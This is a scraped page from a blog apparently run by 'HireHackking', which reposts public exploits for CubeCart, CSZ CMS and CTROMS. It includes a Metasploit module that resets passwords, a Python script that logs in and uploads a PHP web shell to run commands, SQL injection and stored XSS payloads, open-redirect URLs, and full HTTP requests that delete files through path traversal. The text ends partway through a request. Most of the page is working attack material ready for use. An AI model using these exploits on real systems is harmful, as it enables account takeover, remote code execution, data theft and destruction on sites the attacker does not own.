Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863147458

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/51966/info
  
CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
  
A successful exploit may aid in phishing attacks; other attacks are possible.
  
CubeCart 3.0.20 is vulnerable; other versions may also be affected. 

http://www.example.com/cube3.0.20/switch.php?r=//yehg.net/&lang=es
HireHackking 
source: https://www.securityfocus.com/bid/51966/info
 
CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
 
A successful exploit may aid in phishing attacks; other attacks are possible.
 
CubeCart 3.0.20 is vulnerable; other versions may also be affected. 

http://www.example.com/cube3.0.20/admin/login.php?goto=//yehg.net
HireHackking 
CubeCart Multiple Vulnerabilities

Vendor: Devellion Limited
Product: CubeCart
Version: <= 3.0.12
Website: http://www.cubecart.com

BID: 19782 
CVE: CVE-2006-4525 
OSVDB: 28279 28280 28281 
SECUNIA: 21659 

Description:
CubeCart is a very popular web application written in php that allows for an individual to open up a fully functioning online ecommerce service. Unfortunately CubeCart is vulnerable to Cross Site Scripting attacks, SQL Injection attacks, and possible remote code execution due to an attacker being able to include arbitrary php code. An updated version of CubeCart has been released and all users are encouraged to upgrade as soon as possible. 


SQL injection:
There is an SQL injection in CubeCart due to an uninitialized array being used in an sql query. Let's have a look at a section of the vulnerable code from viewCat.inc.php 
$searchwords = split ( "[ ,]", treatGet($_GET['searchStr']));   
foreach($searchwords as $word){
	$searchArray[]=$word;
}

$noKeys = count($searchArray);
$like = "";
for ($i=0; $i<$noKeys;$i++) {
	
$ucSearchTerm = strtoupper($searchArray[$i]);
if(($ucSearchTerm!=="AND") && ($ucSearchTerm!=="OR")){
$like .= "(name LIKE '%".$searchArray[$i]."%' OR description LIKE '%".$searchArray[$i]."%' OR 
productCode LIKE '%".$searchArray[$i]."%') OR ";

As seen in the above code, the searchArray array is never initialized, thus allowing an attacker to inject arbitrary elements into the array. To exploit this issue all an attacker would have to do is append searchArray[]=SQL to their search request. Of course an attacker would need to replace "SQL" with a valid SQL Statement. 


Cross Site Scripting:
There is also a cross site scripting issue in cube cart due to an uninitialized array being used. The "links" array is never initialized, and an attacer may use this to inject arbitrary html or javascript into the rendered template thus allowing for cross site scripting attacks. It should be noted that register globals must be on in order to exploit this issue. 


Arbitrary File Inclusion:
There is a very dangerous file inclusion issue that can be used to remotely execute code on a target system as long as magic quotes gpc is disabled (the default php setting). This is due to the improper use of a regular expression in order to validate the vulnerable variable. Below i code from the vulnerable file named gateway.inc.php 
// sanitise gateway variable
if($basket == TRUE && isset($_POST['gateway']) && eregi("[0-9a-z_-]",$_POST['gateway'])) {
	
//$basket = $cart->setVar($basket['shipCost'],"shipCost");
$basket = $cart->setVar($_POST['gateway'],"gateway");

include("modules/gateway/".$_POST['gateway']."/transfer.inc.php");

The above regular expression actually only checks for the prescence of alphanumeric (dashes and underscores also) characters in the "gateway" variable. So, as long as an attacker doesn't specify a string consisting of only illegal characters then the vulnerability is possible to exploit. Successful exploitation allows for remote php code execution via the inclusion of arbitrary files. 


Solution:
CubeCart were very quick to release an updated version, and users are encouraged to upgrade as soon as possible. 


Credits:
James Bercegay of the GulfTech Security Research Team
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' ,
      'Description'    => %q{
        This module exploits an authentication bypass in CTROMS, triggered by password reset verification code disclosure.
        In order to exploit this vulnerability, the username must be known.
        Exploiting this vulnerability create a new password for the user you specified and present it to you.

        The "verification code" and "cookie generate" functions required to reset the password contain vulnerability.
        When the "userId" parameter is posted to "getverificationcode.jsp", a verification code is transmitted to the account's phone number for password reset. 
        But this verification code written in the database is also reflected in the response of the request. 
        The first vector would be to use this verification code.
        The second vector is the "rand" cookie values returned in this request. These values are md5.
        If these values are assigned in the response, password reset can be done via these cookie values. 
        Ex: [ Cookie: 6fb36ecf2a04b8550ba95603047fe85=fae0bKBGtKBKtKh.wKA.vLBmuLxmuM.; 34d1c350632806406ecc517050da0=b741baa96686a91d4461145e40a9c2df ]
      },
      'References'     =>
        [
          [ 'CVE', '' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/CTROMS-Terminal-OS-Port-Portal-Password-Reset-Authentication-Bypass.html' ],
          [ 'URL', 'https://www.globalservices.bt.com' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "March 2 2020",
      'DefaultOptions' => { 'SSL' => true }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [true, 'Username']),
        OptString.new('PASSWORD', [true, 'Password for the reset', Rex::Text.rand_text_alphanumeric(12)])
      ])
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def check
    begin
    res = send_request_cgi({
      			      'method' => 'POST',
     			      'ctype'  => 'application/x-www-form-urlencoded',
      			      'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
      			      'headers' =>
        			{
          			   'Referer' => "#{peer}/verification.jsp"
        			},
                               'data' => "userId=#{Rex::Text.rand_text_alphanumeric(8)}"
      			     })
    rescue
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 and res.body.include? '"rand"'   
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def run
    unless Exploit::CheckCode::Appears == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    res = send_request_cgi({
      			      'method' => 'POST',
     			      'ctype'  => 'application/x-www-form-urlencoded',
      			      'uri' => normalize_uri(target_uri.path, 'getuserinfo.jsp'),
      			      'headers' =>
        			{
          			   'Referer' => "#{peer}/verification.jsp"
        			},
                               'data' => "userId=#{datastore["USERNAME"]}"
      			     })

    if res.code == 200 and res.body.include? '"mobileMask"'   
      print_good("Excellent! password resettable for #{datastore["USERNAME"]}")
    else 
      fail_with(Failure::NotVulnerable, 'The user you specified is not valid')
    end

    begin

     res = send_request_cgi({
      			      'method' => 'POST',
     			      'ctype'  => 'application/x-www-form-urlencoded',
      			      'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
      			      'headers' =>
        			{
          			   'Referer' => "#{peer}/verification.jsp"
        			},
                               'data' => "userId=#{datastore["USERNAME"]}"
      			     })

      @cookie = res.get_cookies

      res = send_request_cgi({
      			      'method' => 'POST',
     			      'ctype'  => 'application/x-www-form-urlencoded',
      			      'uri' => normalize_uri(target_uri.path, 'getresult.jsp'),
			      'cookie' => @cookie,
      			      'headers' =>
        			{
          			   'Referer' => "#{peer}/verification.jsp"
        			},
                               'data' => "userId=#{datastore["USERNAME"]}&password=#{datastore["PASSWORD"]}"
      			     })
      if res.body.include? 'result":10'
         print_good("boom! Password successfully reseted.")
         print_good("Username : #{datastore["USERNAME"]}")
         print_good("Password : #{datastore["PASSWORD"]}")
      else
         fail_with(Failure::BadConfig, "Unknown error while resetting the password. Response: #{res.code}")
      end
    end
  end
end
HireHackking 
# Title:  CSZCMS v1.3.0 - SQL Injection (Authenticated)
# Author: Abdulaziz Almetairy
# Date: 27/01/2024
# Vendor: https://www.cszcms.com/
# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Reference: https://github.com/oh-az
# Tested on: Windows 11, MySQL, Apache


# 1 - Log in to the admin portal

http://localhost/cszcms/admin/login

# 2 - Navigate to General Menu > Member Users.

# 3 Click the 'View' button next to any username.

# 4 Intercept the request

GET /cszcms/admin/members/view/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss
Upgrade-Insecure-Requests: 1



# 5 Modify the paramter 

/cszcms/admin/members/view/1

to 

/cszcms/admin/members/view/'or(sleep(10))#

and url encode all characters

/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20
HireHackking 
# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution
# Date: 17/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: Version 1.3.0
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS


import os
import zipfile
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.firefox.service import Service as FirefoxService
from webdriver_manager.firefox import GeckoDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import requests
from time import sleep
import sys
import random
import time
import platform
import tarfile
from io import BytesIO

email = "admin@admin.com" 
password = "password"

class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'


color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
                colors.CRED, colors.CBEIGE]
random.shuffle(color_random)


def entryy():
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>
                <<      CODED BY TMRSWRR           >>
                <<     GITHUB==>capture0x          >>

\n"""
    for c in x:
        print(c, end='')
        sys.stdout.flush()
        sleep(0.0045)
    oo = " " * 6 + 29 * "░⣿" + "\n\n"
    for c in oo:
        print(colors.CGREEN + c, end='')
        sys.stdout.flush()
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"
    for c in tt:
        print(colors.CWHITE + c, end='')
        sys.stdout.flush()
        sleep(0.0065)
    xx = " " * 6 + 29 * "░⣿" + "\n\n"
    for c in xx:
        print(colors.CGREEN + c, end='')
        sys.stdout.flush()
        sleep(0.0065)

def check_geckodriver():
    current_directory = os.path.dirname(os.path.abspath(__file__))
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):
        red = "\033[91m"
        reset = "\033[0m"
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)
        user_input = input("Would you like to download it now? (yes/no): ").lower()
        if user_input == 'yes':
            download_geckodriver(current_directory)
        else:
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")
    os_name = platform.system().lower()
    arch, _ = platform.architecture()

    if os_name == "linux":
        os_name = "linux"
        arch = "64" if arch == "64bit" else "32"
    elif os_name == "darwin":
        os_name = "macos"
        arch = "aarch64" if platform.processor() == "arm" else ""
    elif os_name == "windows":
        os_name = "win"
        arch = "64" if arch == "64bit" else "32"
    else:
        print("[!] Unsupported operating system.")
        sys.exit(1)

    geckodriver_version = "v0.33.0"
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"
    ext = "zip" if os_name == "win" else "tar.gz"
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")
    response = requests.get(url, stream=True)

    if response.status_code == 200:
        print("[*] Extracting GeckoDriver...")
        if ext == "tar.gz":
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:
                tar.extractall(path=directory)
        else:   
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:
                zip_ref.extractall(directory)
        print("[+] GeckoDriver downloaded and extracted successfully.")
    else:
        print("[!] Failed to download GeckoDriver.")
        sys.exit(1)
        
def create_zip_file(php_filename, zip_filename, php_code):
    try:
        with open(php_filename, 'w') as file:
            file.write(php_code)
        with zipfile.ZipFile(zip_filename, 'w') as zipf:
            zipf.write(php_filename)
        print("[+] Zip file created successfully.")
        os.remove(php_filename)
        return zip_filename
    except Exception as e:
        print(f"[!] Error creating zip file: {e}")
        sys.exit(1)


def main(base_url, command):

    if not base_url.endswith('/'):
        base_url += '/'
        
    zip_filename = None   

    check_geckodriver()
    try:
        firefox_options = FirefoxOptions()
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))
        geckodriver_path = os.path.join(script_directory, 'geckodriver')
        service = FirefoxService(executable_path=geckodriver_path)
        driver = webdriver.Firefox(service=service, options=firefox_options)
        print("[*] Exploit initiated.")

        # Login
        driver.get(base_url + "admin/login")
        print("[*] Accessing login page...")
        driver.find_element(By.NAME, "email").send_keys(f"{email}")
        driver.find_element(By.NAME, "password").send_keys(f"{password}")
        driver.find_element(By.ID, "login_submit").click()
        print("[*] Credentials submitted...")

 
        try:
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")
            if error_message.is_displayed():
                print("[!] Login failed: Invalid credentials.")
                driver.quit()
                sys.exit(1)
        except NoSuchElementException:
            print("[+] Login successful.")

        # File creation  
        print("[*] Preparing exploit files...")
        php_code = f"<?php echo system('{command}'); ?>"
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

 
        driver.get(base_url + "admin/upgrade")
        print("[*] Uploading exploit payload...")
        file_input = driver.find_element(By.ID, "file_upload")
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

  	# Uploading
        driver.find_element(By.ID, "submit").click()
        WebDriverWait(driver, 10).until(EC.alert_is_present())
        alert = driver.switch_to.alert
        alert.accept()

        # Exploit result 
        exploit_url = base_url + "exploit.php"
        response = requests.get(exploit_url)
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        driver.quit()
        if zip_filename and os.path.exists(zip_filename):
            os.remove(zip_filename)

if __name__ == "__main__":
    entryy()
    if len(sys.argv) < 3:
        print("Usage: python script.py [BASE_URL] [COMMAND]")
    else:
        main(sys.argv[1], sys.argv[2])
HireHackking 
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.

# Steps to reproduce Stored XSS:

Go to url http://localhost/admin/plugin/gallery/edit/2.

When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]
We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.

With the following payload we can achieve the XSS

Payload:

<div><p title="</div><svg/onload=alert(document.domain)>">


#PoC Request:

POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1

gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
HireHackking 
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
# Date: 2023/08/18
# CVE: CVE-2023-38910
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.

# Steps to reproduce Stored XSS:

Go to url http://localhost/admin/carousel.

We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields.
We can inject HTML code.

With the following payload we can achieve the XSS.

Payload:

<div><p title="</div><svg/onload=alert(document.domain)>">


#PoC Request:


POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
Upgrade-Insecure-Requests: 1

carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
HireHackking 
# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Date: 2021-04-22
# Exploit Author: Dogukan Dincer
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Version: 1.3.0
# Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4

# Discovery of Vulnerability

- First go to CSZ CMS web page
- then go to http://yourhost/plugin/article directory on CMS.
- To see the error-based SQLi vulnerability, the ' character is entered in the search section.
- It is determined that the "p" parameter creates the vulnerability.
- Databases can be accessed with manual or automated tools.

# Proof of Concept

http://127.0.0.1/csz-cms/plugin/article/search?p=3D1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

# Sqlmap output:

Parameter: p (GET)
    Type: error-based
    Title: MySQL >=3D 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: p=3D1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=3D8555,1))),0x716a717a71))-- OUUO

    Type: time-based blind
    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=3D1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS
HireHackking 
# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
# Date: 2020/12/28
# Exploit Author: SunCSR
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.2.9
# Tested on: CSZ CMS 1.2.9

1. Reflected XSS
Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc
<http://localhost/pluginabc%22-alert%28origin%29-%22abc>

2. Stored XSS

Use an editor account with rights to manage banners, plugins.

+ Banner Manager:
    - Add or edit banner:
    Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

+ Plugin Manager:
    - Add or edit album(/admin/plugin/gallery):
    Album Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">
    Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Short Description field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">

    - Add or edit Category(/admin/plugin/article/):
    Category Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">
HireHackking 
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
# Date: 2021-04-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
# Version: 1.2.9
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
# CVE: CVE-2021-43701

*Steps to Reproduce:*
1. First login to your Admin Panel
2. then go to "General Menu > CSV Export / Import".
3. open burp site and configure with browser.
4. then select any "Table Name" > Select "Fields Select" and Select "Sort by"
5. Now click "Export to CSV" and intercept with burp suite
6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter.

*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV

*Output:*
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds
HireHackking 
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
# Date: 2021-07-20
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.cszcms.com
# Software Link: https://sourceforge.net/projects/cszcms/files/latest/download
# Version: 1.2.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/cskaza/cszcms/issues/32


################
# Description  #
################

# CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.


##########
# PoC 1  #
##########

Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave
Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php

Steps to Reproduce:

1. Login as admin
2. Goto Plugin Manager > Article > edit any article
3. Upload any image as "Main Picture" and "File Upload" and click save button
4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button
5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2"


1) Assumed there are files conf_secret_file.php and config_backup.txt in web root

PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root

Request: 
========

POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1
Host: localhost
Content-Length: 2048
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25
Connection: close

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="title"

article beta
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="keyword"

testing file
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="short_desc"

deletion
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="cat_id"

2
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="content"

<div class="row">
<div class="col-md-12">
<p>test for file deletion</p>
</div>
</div>
<p><br><br></p>
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file"

../../../conf_secret_file.php
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainPicture"

2021/1626802955_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file2"

../../../config_backup.txt
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload2"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainFile"

2021/1626802956_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="lang_iso"

en
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="active"

1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_active"

1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_limit"

5
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_sort"

reverse_time
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="submit"

Save
------WebKitFormBoundaryAMyATk1BfQaBOHvY--

---



##########
# PoC 2  #
##########

Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update
Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php

Steps to Reproduce:

1. Login as admin
2. Goto General Menu > Site Setting
3. Upload any image as "Site Logo" and "Image of og metatag" and click save button
4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button
5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image"


2) Assumed there are files conf_secret_file.php and config_backup.txt in web root

PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root

Request: 
========

POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1
Host: localhost
Content-Length: 5163
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
